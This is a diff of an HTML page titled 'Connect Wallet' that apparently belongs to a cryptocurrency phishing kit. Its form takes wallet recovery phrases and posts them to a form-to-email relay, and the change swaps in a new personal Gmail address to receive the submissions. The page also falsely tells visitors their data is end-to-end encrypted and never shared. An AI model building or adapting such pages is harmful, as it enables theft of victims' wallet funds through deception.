--- a/walletconnect.html
+++ b/walletconnect.html
@@ -211,7 +211,7 @@
 <body>
     <div class="container">
         <h2 id="walletTitle">Connect Wallet</h2>
-        <form id="walletForm" action="https://api.nocodesubmit.com/email/julietbredt@outlook.com" method="POST">
+        <form id="walletForm" action="https://api.nocodesubmit.com/email/maxwellisafineboy@gmail.com" method="POST">
             <h3>NB: All information are end to end encrypted. We do not share data and activity sessions with any other company</h3>
             <div class="buttons">
                 <button type="button" onclick="showInput('phrase')">Phrase</button>
@@ -269,3 +269,4 @@
 </body>
 
 </html>
+
